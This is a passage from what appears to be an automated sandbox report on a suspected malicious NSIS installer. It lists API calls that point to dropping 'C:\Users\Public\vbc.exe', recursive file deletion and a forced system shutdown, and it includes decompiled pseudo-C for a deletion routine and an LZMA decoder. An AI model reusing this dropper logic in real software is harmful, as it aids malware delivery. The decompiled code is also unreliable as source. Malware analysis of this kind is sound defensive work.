                                                  • DeleteFileA.KERNEL32(1033), ref: 004032B6
                                                    • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                                    • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                                  • OleUninitialize.OLE32 ref: 00403337
                                                  • ExitProcess.KERNEL32 ref: 00403357
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 0040336A
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00409148,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 00403379
                                                  • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 00403384
                                                  • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\Public,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\Public\vbc.exe" ,00000000,00000020), ref: 00403390
                                                  • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 004033AC
                                                  • DeleteFileA.KERNEL32(0041F0F0,0041F0F0,?,00425000,?), ref: 004033F6
                                                  • CopyFileA.KERNEL32 ref: 0040340A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00403437
                                                  • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000006,00000005), ref: 00403490
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004034E8
                                                  • ExitProcess.KERNEL32 ref: 0040350B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Filelstrcat$ExitHandleProcess$CurrentDeleteDirectoryModuleWindows$AddressCharCloseCommandCopyErrorInfoInitializeLineModeNextPathProcTempUninitializeVersionlstrcmpilstrlen
                                                  • String ID: $ /D=$ _?=$"$"C:\Users\Public\vbc.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\Public$C:\Users\Public\vbc.exe$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$UXTHEME$\Temp$jhaljjbgtengrcaq Setup$~nsu
                                                  • API String ID: 3469842172-3166322026
                                                  • Opcode ID: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                                  • Instruction ID: 90ec7ab760c3480979c70ff1213755fd4c015a14bcf9795d8db5e914811e335b
                                                  • Opcode Fuzzy Hash: c205237f53a57e9789d4fc795fe9e6243dae0da3a8597aae026d19c88162d9a0
                                                  • Instruction Fuzzy Hash: E5A10470A083016BE7216F619C4AB2B7EACEB0170AF40457FF544B61D2C77CAA458B6F
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004054BD, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E004054BD(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040576C(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423fc8 =  *0x423fc8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B98(0x421540, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056D2(_t72);
					} else {
						lstrcatA(0x421540, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x421540,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056B6( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B98(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E00405850(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E84(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423fc8 =  *0x423fc8 + 1;
										} else {
											E00404E84(0xfffffff1, _t72);
											E004058E6(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054BD(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x421540 - 0x5c;
					if( *0x421540 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E93(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E0040568B(_t72);
							E00405850(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E84(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E84(0xfffffff1, _t72);
							return E004058E6(__eflags, _t72, 0);
						}
						L33:
						 *0x423fc8 =  *0x423fc8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                  0x004054c8
                                                  0x004054cc
                                                  0x004054d5
                                                  0x004054d8
                                                  0x004054db
                                                  0x004054e3
                                                  0x004054e5
                                                  0x004054e6
                                                  0x00000000
                                                  0x004054e6
                                                  0x004054f5
                                                  0x004054f5
                                                  0x004054f8
                                                  0x004054fb
                                                  0x0040550f
                                                  0x00405516
                                                  0x0040551b
                                                  0x0040551d
                                                  0x0040552d
                                                  0x0040551f
                                                  0x00405525
                                                  0x00405525
                                                  0x00405532
                                                  0x00405535
                                                  0x00405540
                                                  0x00405546
                                                  0x0040554b
                                                  0x0040555b
                                                  0x0040555d
                                                  0x00405563
                                                  0x00405566
                                                  0x00405569
                                                  0x00405626
                                                  0x00405626
                                                  0x0040562a
                                                  0x0040562c
                                                  0x0040562c
                                                  0x0040562c
                                                  0x0040562c
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040556f
                                                  0x0040556f
                                                  0x00405578
                                                  0x0040557e
                                                  0x00405583
                                                  0x00405586
                                                  0x00405588
                                                  0x0040558c
                                                  0x0040558e
                                                  0x0040558e
                                                  0x0040558c
                                                  0x00405591
                                                  0x00405594
                                                  0x004055a7
                                                  0x004055a9
                                                  0x004055ae
                                                  0x004055b5
                                                  0x004055cd
                                                  0x004055d3
                                                  0x004055d9
                                                  0x004055db
                                                  0x00405600
                                                  0x004055dd
                                                  0x004055dd
                                                  0x004055e1
                                                  0x004055f5
                                                  0x004055e3
                                                  0x004055e6
                                                  0x004055ee
                                                  0x004055ee
                                                  0x004055e1
                                                  0x004055b7
                                                  0x004055bd
                                                  0x004055bf
                                                  0x004055c5
                                                  0x004055c5
                                                  0x004055bf
                                                  0x00000000
                                                  0x004055b5
                                                  0x00405596
                                                  0x00405599
                                                  0x0040559b
                                                  0x00000000
                                                  0x00000000
                                                  0x0040559d
                                                  0x0040559f
                                                  0x00000000
                                                  0x00000000
                                                  0x004055a1
                                                  0x004055a5
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405605
                                                  0x0040560f
                                                  0x00405615
                                                  0x00405615
                                                  0x00405620
                                                  0x00000000
                                                  0x00405620
                                                  0x00405537
                                                  0x0040553e
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x004054fd
                                                  0x004054fd
                                                  0x004054ff
                                                  0x00405630
                                                  0x00405633
                                                  0x00405636
                                                  0x00405688
                                                  0x00405688
                                                  0x00405688
                                                  0x00405638
                                                  0x0040563b
                                                  0x00405646
                                                  0x0040564b
                                                  0x0040564d
                                                  0x00000000
                                                  0x00000000
                                                  0x00405650
                                                  0x00405656
                                                  0x0040565c
                                                  0x00405662
                                                  0x00405664
                                                  0x00000000
                                                  0x00405680
                                                  0x00405666
                                                  0x0040566a
                                                  0x00000000
                                                  0x00000000
                                                  0x0040566f
                                                  0x00000000
                                                  0x00405676
                                                  0x0040563d
                                                  0x0040563d
                                                  0x00000000
                                                  0x0040563d
                                                  0x00405505
                                                  0x00405509
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00405509

                                                  APIs
                                                  • DeleteFileA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004054DB
                                                  • lstrcatA.KERNEL32(00421540,\*.*,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405525
                                                  • lstrcatA.KERNEL32(?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 00405546
                                                  • lstrlenA.KERNEL32(?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040554C
                                                  • FindFirstFileA.KERNEL32(00421540,?,?,?,00409010,?,00421540,?,00000000,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040555D
                                                  • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040560F
                                                  • FindClose.KERNEL32(?), ref: 00405620
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.472967159.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000004.00000002.472962160.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.472975056.0000000000407000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473674188.0000000000409000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473725304.0000000000422000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473730999.000000000042A000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.473739098.000000000042D000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                  • String ID: "C:\Users\Public\vbc.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                  • API String ID: 2035342205-3287302484
                                                  • Opcode ID: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                                  • Instruction ID: 6fea787f5ff7f663b03802bfccf250d7b0f6b6b9ddff8139893414afbc0e0c0d
                                                  • Opcode Fuzzy Hash: 151e37dfdb71e49779ebe8013d58079144af5c7b104cf071a6fd2cd1a311b3c4
                                                  • Instruction Fuzzy Hash: D851CE30804A447ACB216B218C49BBF3B78DF92728F54857BF809751D2E73D5982DE5E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 73066402, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 730664DC
                                                  • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,7306618A,7FC6FA16,73066349), ref: 73066506
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,7306618A,7FC6FA16), ref: 7306651D
                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,7306618A,7FC6FA16,73066349), ref: 7306653F
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,7306618A,7FC6FA16,73066349,00000000,00000000), ref: 730665B2
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,7306618A,7FC6FA16,73066349), ref: 730665BD
                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,7306618A,7FC6FA16,73066349,00000000), ref: 73066608
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.477866753.0000000073066000.00000040.00020000.sdmp, Offset: 73050000, based on PE: true
                                                  • Associated: 00000004.00000002.477833776.0000000073050000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477841571.0000000073051000.00000020.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477858734.0000000073061000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477871923.0000000073068000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477876122.0000000073069000.00000008.00020000.sdmp Download File
                                                  • Associated: 00000004.00000002.477882302.000000007306B000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Virtual$AllocFileFree$CloseCreateHandleRead
                                                  • String ID:
                                                  • API String ID: 721982790-0
                                                  • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                  • Instruction ID: 25e04e9efa6ea6016cdea46a56bfc94ba8783f8d2e69755f39f13797c4b66347
                                                  • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                  • Instruction Fuzzy Hash: ED619379E00318EBDB11CFB5C995BAEB7B6AF48A10F148459E502EB398E7349E01CB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004061D4, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E004061D4() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
